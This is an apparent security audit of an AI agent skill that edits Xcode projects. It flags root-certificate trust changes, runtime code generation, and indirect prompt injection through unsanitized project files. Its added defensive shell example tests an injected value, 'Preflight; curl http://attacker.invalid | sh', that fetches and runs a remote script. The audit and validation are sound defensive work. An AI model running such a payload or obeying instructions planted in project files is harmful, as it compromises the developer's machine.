preflight-permissions
Warn
Audited by Gen Agent Trust Hub on Mar 28, 2026
Risk Level: MEDIUM
Tags: COMMAND_EXECUTION, DATA_EXFILTRATION, PROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: The skill performs sensitive security operations using the `security` command-line utility. It creates a self-signed certificate, imports it into `~/Library/Keychains/login.keychain-db`, and marks it as a trusted root using `security add-trusted-cert -d -r trustRoot`. This modifies the trust store of the host machine: any TLS endpoint or code signature chaining to that certificate will be accepted from then on. With `-d` the trust setting is written to the admin trust domain, which requires administrator privileges and applies to every user on the machine, not only the developer running the skill.
- [COMMAND_EXECUTION]: The skill uses `sed` to programmatically modify project files such as `.pbxproj` or `project.yml`. It also executes `xcodebuild` to build applications and run tests. Notably, it generates a Swift test file (`PermissionSmokeTests`) at runtime and executes it, which constitutes dynamic code generation and execution.
- [DATA_EXFILTRATION]: The skill targets the sensitive path `~/Library/Keychains/login.keychain-db`. While used for legitimate development purposes in this context, accessing or modifying the keychain database is a high-risk operation because that file holds the user's stored credentials.
- [PROMPT_INJECTION]: The skill is vulnerable to indirect prompt injection because it parses untrusted local files to determine command arguments.
  - Ingestion points: The skill reads `project.yml`, `*.xcodeproj`, entitlements files, and performs recursive `grep` operations on the project source directory to find strings such as bundle IDs and target names.
  - Boundary markers: Absent. There are no delimiters or instructions to the agent to disregard malicious instructions embedded in the project files being analyzed.
  - Capability inventory: The skill can modify the macOS keychain, trust certificates, modify local files via `sed`, and execute code via `xcodebuild` and `open`.
  - Sanitization: Absent. Extracted values such as `{AppName}` and `{Project}` are used directly in shell scripts and Swift code without validation or escaping, so a value containing shell metacharacters or Swift syntax would be interpolated unchanged.
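The missing sanitization step, as an added example that is not part of the audited skill: allowlist validation for target names and bundle IDs extracted from `project.yml` or the project tree before they are interpolated into a `sed` edit, an `xcodebuild` argument or a generated Swift file. The function names, the `{AppName}` placeholder convention and the sample file are assumptions constructed for the example; the skill's own extraction and substitution code is not reproduced here.

```shell
#!/bin/sh
# Added example, not code from the audited skill. Validates values pulled out
# of project files against a strict allowlist before they reach a shell
# command or generated Swift source. Function names, the {AppName}
# placeholder and the sample project.yml fragment are assumptions.

# A target/app name used as an xcodebuild argument and as a Swift identifier:
# letters, digits and underscore only, no leading digit, at most 64 chars.
# Newlines, ';', '|', '`', '$(' and quotes all fall outside the allowlist.
is_safe_target_name() {
  case "$1" in
    ''|*[!A-Za-z0-9_]*) return 1 ;;   # empty, or a character outside the allowlist
    [0-9]*)             return 1 ;;   # Swift identifiers cannot start with a digit
  esac
  [ "${#1}" -le 64 ]
}

# A reverse-DNS bundle identifier: alphanumerics, dots and hyphens,
# at least two labels, no leading, trailing or empty label.
is_safe_bundle_id() {
  case "$1" in
    ''|*[!A-Za-z0-9.-]*) return 1 ;;  # empty, or a character outside the allowlist
    .*|*.|*..*)          return 1 ;;  # leading, trailing or empty label
    *.*)                 ;;           # at least one dot: acceptable shape
    *)                   return 1 ;;  # single label, not reverse-DNS
  esac
  [ "${#1}" -le 255 ]
}

# The unsafe pattern the audit describes is roughly:
#   sed -i "s/{AppName}/$name/g" "$file"
# with $name taken straight from a grep over the project tree. This is the
# same edit gated on validation. Because the allowlist excludes '/', '&'
# and '\', a validated name is also safe inside the sed replacement text.
set_target_name() {
  file=$1
  name=$2
  if ! is_safe_target_name "$name"; then
    printf 'refusing to use target name: %s\n' "$name" >&2
    return 1
  fi
  sed -i.bak "s/{AppName}/$name/g" "$file" && rm -f "$file.bak"
}

# Demo on a constructed project.yml fragment. The second call carries the
# kind of command-injection payload a planted project file could contain.
demo() {
  tmp=$(mktemp)
  printf 'targets:\n  {AppName}:\n    type: application\n' > "$tmp"
  set_target_name "$tmp" Preflight && cat "$tmp"
  set_target_name "$tmp" 'Preflight; curl http://attacker.invalid | sh' || echo "rejected"
  rm -f "$tmp"
}

demo
```

The same two predicates would gate the `xcodebuild -scheme "$name"` invocation and the name written into the generated `PermissionSmokeTests` source; rejecting on validation failure is preferable to escaping, since an identifier that needs escaping has no legitimate reason to appear in a project file.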
Audit Metadata